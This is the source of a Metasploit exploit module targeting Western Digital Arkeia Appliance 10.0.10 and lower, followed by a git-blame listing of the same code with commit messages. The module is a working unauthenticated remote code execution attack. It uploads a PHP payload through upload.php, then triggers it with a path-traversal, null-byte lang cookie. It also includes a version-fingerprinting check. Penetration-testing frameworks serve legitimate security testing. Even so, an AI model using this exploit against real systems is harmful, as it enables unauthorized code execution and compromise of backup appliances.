metasploit-framework/modules/exploits/unix/webapp/arkeia_upload_exec.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Western Digital Arkeia Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Western Digital Arkeia Appliance
        version 10.0.10 and lower. By abusing the upload.php script,
        a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp
        directory without authentication. Abusing the local file inclusion in the lang
        cookie to parse this file results in arbitrary code execution, also without
        authentication. The module has been tested successfully on Arkeia 10.0.10. The issues
        have been fixed in version 10.1.10.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
         'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References'      =>
        [
          [ 'OSVDB', '97614' ],
          [ 'OSVDB', '97615' ],
          [ 'EDB', '28330' ]
        ],
      'Platform'        => ['php'],
      'Arch'            => ARCH_PHP,
      'Targets'         =>
        [
          ['Western Digital Arkeia Appliance 10.0.10', {}]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => "Sep 16 2013",
      'DefaultTarget'   => 0))

    register_options(
      [
       OptString.new('TARGETURI', [true, 'The base path to the Arkeia Appliance', '/'])
      ], self.class)
  end

  def uri
    return target_uri.path
  end

  def check
    # Check version
    print_status("#{peer} - Trying to detect installed version")

    res = send_request_cgi({
     'method' => 'GET',
     'uri'    => normalize_uri(uri)
    })

    if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    vprint_status("#{peer} - Version #{version} detected")

    if version > "10.0.10"
      return Exploit::CheckCode::Safe
    end

    # Check for vulnerable component
    vprint_status("#{peer} - Trying to detect the vulnerable component")

    res = send_request_cgi({
      'method' => 'GET',
      'headers' => { 'Cookie' => "lang=fr" },
      'uri'    => normalize_uri(uri)
    })

    if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    payload_name = rand_text_alpha(rand(10) + 5)

    post_data = Rex::MIME::Message.new
    post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")
    file = post_data.to_s
    file.strip!

    print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, "scripts", "upload.php"),
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'data'   => file
    })

    # If the server returns 200 we assume we uploaded the malicious
    # file successfully
    if not res or res.code != 200
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
    end

    register_files_for_cleanup("/tmp/ApplianceUpdate")

    print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate")
    res = send_request_cgi({
      'method' => 'GET',
      'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },
      'uri'    => normalize_uri(uri)
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.
    if res and res.code != 200
      print_error("#{peer} - Unexpected response, probably the exploit failed")
    end

  end

end
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::FileDropper`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Western Digital Arkeia Remote Code Execution",`
			`'Description' => %q{`
			`This module exploits a vulnerability found in Western Digital Arkeia Appliance`
Update descriptions for clarity. 2013-09-23 18:48:23 +00:00			`version 10.0.10 and lower. By abusing the upload.php script,`
Fix metadata 2013-09-19 17:41:13 +00:00			`a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp`
Update descriptions for clarity. 2013-09-23 18:48:23 +00:00			`directory without authentication. Abusing the local file inclusion in the lang`
			`cookie to parse this file results in arbitrary code execution, also without`
Fix metadata 2013-09-19 17:41:13 +00:00			`authentication. The module has been tested successfully on Arkeia 10.0.10. The issues`
			`have been fixed in version 10.1.10.`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`},`
changes to arkeia_upload_exec to comply with r7 suggestions 2013-09-18 01:10:58 +00:00			`'License' => MSF_LICENSE,`
			`'Author' =>`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`[`
			`'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module`
			`],`
changes to arkeia_upload_exec to comply with r7 suggestions 2013-09-18 01:10:58 +00:00			`'References' =>`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`[`
Add OSVDB references to arkeia_upload_exec 2013-09-24 13:48:28 +00:00			`[ 'OSVDB', '97614' ],`
			`[ 'OSVDB', '97615' ],`
			`[ 'EDB', '28330' ]`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`],`
changes to arkeia_upload_exec to comply with r7 suggestions 2013-09-18 01:10:58 +00:00			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' =>`
			`[`
			`['Western Digital Arkeia Appliance 10.0.10', {}]`
			`],`
Fix my own cleanup 2013-09-19 19:51:22 +00:00			`'Privileged' => false,`
changes to arkeia_upload_exec to comply with r7 suggestions 2013-09-18 01:10:58 +00:00			`'DisclosureDate' => "Sep 16 2013",`
			`'DefaultTarget' => 0))`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The base path to the Arkeia Appliance', '/'])`
			`], self.class)`
			`end`

Refactor easy methods 2013-09-19 17:42:38 +00:00			`def uri`
			`return target_uri.path`
			`end`

			`def check`
Fix check indentation 2013-09-19 17:44:11 +00:00			`# Check version`
			`print_status("#{peer} - Trying to detect installed version")`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
Fix check indentation 2013-09-19 17:44:11 +00:00			`res = send_request_cgi({`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`'method' => 'GET',`
Fix use of normalize_uri 2013-09-19 17:59:37 +00:00			`'uri' => normalize_uri(uri)`
Fix check indentation 2013-09-19 17:44:11 +00:00			`})`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
Fix check indentation 2013-09-19 17:44:11 +00:00			`if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/`
			`version = $1`
			`else`
			`return Exploit::CheckCode::Unknown`
			`end`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
Saving progress Progress group 3: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 19:03:36 +00:00			`vprint_status("#{peer} - Version #{version} detected")`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
Fix check indentation 2013-09-19 17:44:11 +00:00			`if version > "10.0.10"`
			`return Exploit::CheckCode::Safe`
			`end`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
Fix check indentation 2013-09-19 17:44:11 +00:00			`# Check for vulnerable component`
Saving progress Progress group 3: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 19:03:36 +00:00			`vprint_status("#{peer} - Trying to detect the vulnerable component")`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
Fix check indentation 2013-09-19 17:44:11 +00:00			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'headers' => { 'Cookie' => "lang=fr" },`
Fix use of normalize_uri 2013-09-19 17:59:37 +00:00			`'uri' => normalize_uri(uri)`
Fix check indentation 2013-09-19 17:44:11 +00:00			`})`

			`if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/`
Saving progress Progress group 3: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 19:03:36 +00:00			`return Exploit::CheckCode::Appears`
Fix check indentation 2013-09-19 17:44:11 +00:00			`end`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
changes to arkeia_upload_exec to comply with r7 suggestions 2013-09-18 01:10:58 +00:00			`payload_name = rand_text_alpha(rand(10) + 5)`

			`post_data = Rex::MIME::Message.new`
			`post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")`
			`file = post_data.to_s`
			`file.strip!`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
			`print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate")`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => normalize_uri(uri, "scripts", "upload.php"),`
changes to arkeia_upload_exec to comply with r7 suggestions 2013-09-18 01:10:58 +00:00			`'ctype' => "multipart/form-data; boundary=#{post_data.bound}",`
			`'data' => file`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`})`

Update code comment 2013-09-19 18:03:55 +00:00			`# If the server returns 200 we assume we uploaded the malicious`
			`# file successfully`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`if not res or res.code != 200`
Fix my own cleanup 2013-09-19 19:51:22 +00:00			`fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`end`

changes to arkeia_upload_exec to comply with r7 suggestions #2 2013-09-18 01:24:40 +00:00			`register_files_for_cleanup("/tmp/ApplianceUpdate")`

added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate")`
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },`
Fix use of normalize_uri 2013-09-19 17:59:37 +00:00			`'uri' => normalize_uri(uri)`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`})`

			`# If we don't get a 200 when we request our malicious payload, we suspect`
changes to arkeia_upload_exec to comply with r7 suggestions 2013-09-18 01:10:58 +00:00			`# we don't have a shell, either.`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`if res and res.code != 200`
Fix usage of fail_with 2013-09-19 17:45:29 +00:00			`print_error("#{peer} - Unexpected response, probably the exploit failed")`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00			`end`

Retab all the things (except external/) 2013-09-30 18:47:53 +00:00			`end`
added WD Arkeia Appliance RCE 2013-09-16 07:38:50 +00:00
			`end`